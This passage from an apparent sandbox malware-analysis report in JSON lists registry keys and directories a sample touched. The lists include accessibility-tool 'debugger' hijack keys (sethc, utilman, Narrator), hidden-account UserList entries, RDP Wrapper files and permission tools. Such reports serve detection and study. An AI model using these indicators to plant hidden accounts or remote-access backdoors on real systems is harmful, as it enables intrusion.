"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\DevicePath",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\DiscoveryManager\\RepubQuorumSize",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList\\helpassistant",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Command Processor\\PathCompletionChar",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\UserenvDebugLevel",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\Roaming\\RefreshDllName",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\ibhost.exe\\debugger",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\HostedCache\\DoNotUseSSL",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79621\\Version",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\IPHLPSVC\\config\\Connectivity_Platform_Enabled",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79617\\Version",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\HostedCache\\MaxSimultaneousUploads",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79619\\Registration Date",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.64.1.1!7\\Name",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\SystemRestore\\RPLifeInterval",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79617\\Friendly Name",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Cryptography\\Defaults\\Provider\\Microsoft Base Cryptographic Provider v1.0\\Type",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\TermService\\Parameters\\ServiceDll",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79621\\Validator Clsid",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\MountPoints2\\CPC\\Volume\\{3f5cc1b5-70f9-11e8-b07b-806e6f6e6963}\\Data",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\WinStations\\RDP-Tcp\\UserAuthentication",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\HostedCache\\ServerRole",
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\@%SystemRoot%\\system32\\eapqec.dll,-103",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Language\\InstallLanguageFallback",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\CurrentBuildNumber",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Command Processor\\DefaultColor",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\uddisrw.exe\\debugger",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\crypt32\\DebugHeapFlags",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\System\\GpSvcDebugLevel",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\EnablePunycode",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79619\\Config Clsid",
"HKEY_CURRENT_USER\\Keyboard Layout\\Toggle\\Layout Hotkey",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\HostedCache\\MaxSimultaneousDownloads",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\\debugger",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\safer\\codeidentifiers\\DefaultLevel",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79621\\Vendor Name",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\SecurityManager\\BlockSize",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Command Processor\\PathCompletionChar",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\MachineGuid",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79621\\Component Type",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79623\\Vendor Name",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\Windows Error Reporting\\WMR\\Disable",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\WBEM\\CIMOM\\EnableObjectValidation",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Cryptography\\Defaults\\Provider\\Microsoft Base DSS and Diffie-Hellman Cryptographic Provider\\Type",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Rpc\\SecurityService\\DefaultAuthLevel",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79617\\Vendor Name",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Command Processor\\EnableExtensions",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\CurrentBuildNumber",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\HostedCache\\TransportDllPath",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontSubstitutes\\Segoe UI",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Cryptography\\Defaults\\Provider\\Microsoft DH SChannel Cryptographic Provider\\Type",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SQMClient\\Windows\\DisabledSessions\\MachineThrottling",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\HostedCache\\MaxPendingDownloads",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\Defaults\\Provider\\Microsoft Enhanced RSA and AES Cryptographic Provider\\Type",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\SESSION MANAGER\\SafeProcessSearchMode",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\WBEM\\CIMOM\\Logging",
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\@%SystemRoot%\\system32\\tsgqec.dll,-100",
"HKEY_CURRENT_USER\\Control Panel\\Desktop\\MuiCached\\MachinePreferredUILanguages",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\LDAP\\LdapClientIntegrity",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\DiscoveryManager\\MinBackoffWindow",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\Defaults\\Provider\\Microsoft Enhanced Cryptographic Provider v1.0\\Type",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\History\\{35378EAC-683F-11D2-A89A-00C04FBBCFA2}\\0\\Version",
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\@%SystemRoot%\\system32\\tsgqec.dll,-102",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79617\\Registration Date",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\DownloadManager\\TransportDllPath",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Cryptography\\PrivateKeyLifetimeSeconds",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\IsTextPlainHonored",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\EOSNotify.exe\\debugger",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\explorer\\AutoComplete\\AutoSuggest",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Internet Explorer\\MAIN\\FeatureControl\\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\\WMIC.exe",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\SecurityManager\\NumBlocksPerSegment",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79623\\Enabled",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\UILanguages\\en-US\\Type",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79617\\Component Type",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79621\\Info Clsid",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\UserenvDebugLevel",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Command Processor\\DefaultColor",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe\\debugger",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Cryptography\\Defaults\\Provider\\Microsoft Strong Cryptographic Provider\\Type",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\WinStations\\RDP-Tcp\\MaxConnectionTime",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79623\\Validator Clsid",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Command Processor\\AutoRun",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79617\\Config Clsid",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.64.1.1!7\\Name",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Terminal Services\\UserAuthentication",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\Interface\\{00000134-0000-0000-C000-000000000046}\\ProxyStubClsid32\\(Default)",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\DownloadManager\\CryptoAlgo",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\Wow6432Node\\Interface\\{423EC01E-2E35-11D2-B604-00104B703EFD}\\ProxyStubClsid32\\(Default)",
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\@%SystemRoot%\\system32\\qagentrt.dll,-10",
"HKEY_CURRENT_USER\\Control Panel\\Desktop\\PreferredUILanguages",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\Defaults\\Provider\\Microsoft Base DSS Cryptographic Provider\\Type",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\WinStations\\RDP-Tcp\\MaxIdleTime",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.47.1.1!7\\Name",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\HostedCache\\ClientAuth",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\UILanguages\\en-US\\AlternateCodePage",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\Wow6432Node\\Interface\\{1C1C45EE-4395-11D2-B60B-00104B703EFD}\\ProxyStubClsid32\\(Default)",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\Roaming\\RefreshProcName",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\Defaults\\Provider\\Microsoft Base Smart Card Crypto Provider\\Type",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79617\\Validator Clsid",
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\@%SystemRoot%\\system32\\eapqec.dll,-101",
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\@%SystemRoot%\\system32\\eapqec.dll,-100",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Command Processor\\DelayedExpansion",
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\@%SystemRoot%\\system32\\eapqec.dll,-102",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\ListviewAlphaSelect",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\ScrollInterval",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79621\\Config Clsid",
"HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\CreateUriCacheSize",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Internet Explorer\\MAIN\\FeatureControl\\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\\*",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\Defaults\\Provider\\Microsoft Strong Cryptographic Provider\\Image Path",
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\@%SystemRoot%\\system32\\p2pcollab.dll,-8042",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\Tcpip\\Parameters\\Hostname",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Cryptography\\Defaults\\Provider\\Microsoft Enhanced Cryptographic Provider v1.0\\Type",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\AccListViewV6",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79617\\Info Clsid",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\Defaults\\Provider\\Microsoft DH SChannel Cryptographic Provider\\Type",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Command Processor\\CompletionChar",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\WBEM\\TextSource\\1\\TextSourceDll",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\CreateUriCacheSize",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79619\\Info Clsid",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\Defaults\\Provider\\Microsoft Enhanced DSS and Diffie-Hellman Cryptographic Provider\\Type",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79619\\Vendor Name",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\SharedAccess\\Epoch\\Epoch",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79623\\Info Clsid",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\LocalConfig\\Enable Tracing",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.67.1.2!7\\Name",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\DragMinDist",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\ExtendedLocale\\en-US",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Lsa\\AccessProviders\\MartaExtension",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList\\ontar",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\TurnOffSPIAnimations",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Srp\\GP\\RuleCount",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\EnablePunycode",
"HKEY_LOCAL_MACHINE\\SYSTEM\\Setup\\Upgrade",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\Defaults\\Provider\\Microsoft Base Cryptographic Provider v1.0\\Type",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\Defaults\\Provider\\Microsoft Base DSS and Diffie-Hellman Cryptographic Provider\\Type",
"HKEY_LOCAL_MACHINE\\SYSTEM\\Setup\\OOBEInProgress",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79623\\Friendly Name",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\explorer\\AutoComplete\\Client\\(Default)",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79621\\Registration Date",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\UseDoubleClickTimer",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\safer\\codeidentifiers\\Levels",
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\@%SystemRoot%\\system32\\dnsapi.dll,-103",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\EnableBalloonTips",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79621\\Friendly Name",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Command Processor\\DisableUNCCheck",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\SecurityManager\\Restricted\\Seed",
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\@%SystemRoot%\\system32\\tsgqec.dll,-101",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79619\\Friendly Name",
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\@%SystemRoot%\\system32\\tsgqec.dll,-103",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\CreateUriCacheSize",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Security_HKLM_only",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\Status\\GPExtensions\\{35378EAC-683F-11D2-A89A-00C04FBBCFA2}\\LastPolicyTime",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\DevicePath",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\CTF\\EnableAnchorContext",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Internet Explorer\\MAIN\\FeatureControl\\FEATURE_MIME_HANDLING\\WMIC.exe",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\safer\\codeidentifiers\\LogFileName",
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\@%SystemRoot%\\System32\\fveui.dll,-844",
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\@%SystemRoot%\\System32\\fveui.dll,-843",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Lsa\\FipsAlgorithmPolicy",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\EnablePunycode",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Rpc\\Extensions\\RemoteRpcDll",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\AllowTSConnections",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\Roaming\\ForceRoamingDetect",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\Wow6432Node\\CLSID\\{00BB2763-6A77-11D0-A535-00C04FD7D062}\\InProcServer32\\(Default)",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\en-US",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\GRE_Initialize\\DisableMetaFiles",
"HKEY_CURRENT_USER\\Control Panel\\Desktop\\SmoothScroll",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79621\\Description",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79623\\Description",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SQMClient\\Windows\\DisabledProcesses\\F6C4EC9A",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79619\\Version",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\WBEM\\CIMOM\\Log File Max Size",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Cryptography\\PrivKeyCacheMaxItems",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SQMClient\\Windows\\DisabledSessions\\GlobalSession",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\MountPoints2\\CPC\\Volume\\{3f5cc1b6-70f9-11e8-b07b-806e6f6e6963}\\Generation",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\Wow6432Node\\CLSID\\{03C036F1-A186-11D0-824A-00AA005B4383}\\InProcServer32\\(Default)",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Cryptography\\PrivKeyCachePurgeIntervalSeconds",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SFCDisable",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SQMClient\\Windows\\CEIPEnable",
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\@%SystemRoot%\\system32\\dhcpqec.dll,-103",
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\@%SystemRoot%\\system32\\dhcpqec.dll,-102",
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\@%SystemRoot%\\system32\\dhcpqec.dll,-101",
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\@%SystemRoot%\\system32\\dhcpqec.dll,-100",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\safer\\codeidentifiers\\PolicyScope",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79623\\Registration Date",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\ComputerName\\ActiveComputerName\\ComputerName",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Narrator.exe\\debugger",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Language Groups\\1",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\ListviewShadow",
"HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\EnablePunycode",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Locale\\00000409",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79623\\Config Clsid",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.47.1.1!7\\Name",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Cryptography\\Defaults\\Provider\\Microsoft Enhanced RSA and AES Cryptographic Provider\\Type",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\Wow6432Node\\Interface\\{00000134-0000-0000-C000-000000000046}\\ProxyStubClsid32\\(Default)",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\TCPIP6\\Parameters\\DisabledComponents",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\WinStations\\RDP-Tcp\\MaxDisconnectionTime",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79617\\Enabled",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79623\\Version",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\ScrollInset",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\StringCacheSettings\\StringCacheGeneration",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\LocalConfig\\PlumbIpsecPolicy",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Command Processor\\AutoRun"
],
"directory_enumerated": [
"C:\\Python27\\Scripts\\attrib",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\WMIC.*",
"C:\\Python27\\Scripts\\cacls",
"C:\\Users\\cuck\\AppData\\Local\\Temp",
"C:\\Windows\\System32\\attrib.*",
"C:\\Windows\\System32\\takeown.COM",
"C:\\Python27\\Scripts\\reg.*",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\RDPWInst.EN",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\y.*",
"C:\\Python27\\Find.*",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\net",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\netsh",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\y",
"C:\\Windows\\System32\\attrib.COM",
"C:\\Windows\\System32\\wbem\\subinacl.exe.*",
"C:\\Windows\\System32\\netsh.COM",
"C:\\Python27\\Scripts\\net",
"C:\\Python27\\Scripts\\net.*",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\sc",
"C:\\Windows\\System32\\timeout.COM",
"C:\\Windows\\SysWOW64\\sethc.exe",
"C:\\Windows\\System32\\Reg.*",
"C:\\Windows\\System32\\find.COM",
"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\y.*",
"C:\\Python27\\Scripts\\Reg.exe",
"C:\\Python27\\Scripts\\subinacl.exe.*",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\net.*",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\RDPWInst.en",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\WMIC",
"C:\\Documents and settings",
"C:\\Windows\\System32\\WMIC",
"C:\\Windows\\System32\\sc.exe",
"C:\\Python27\\Scripts\\netsh",
"C:\\Windows\\System32\\timeout.*",
"C:\\Python27\\Reg.exe",
"C:\\Python27\\Scripts\\subinacl.exe",
"C:\\Python27\\reg",
"C:\\Python27\\cacls.*",
"C:\\Windows\\System32\\net.exe",
"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\subinacl.exe.*",
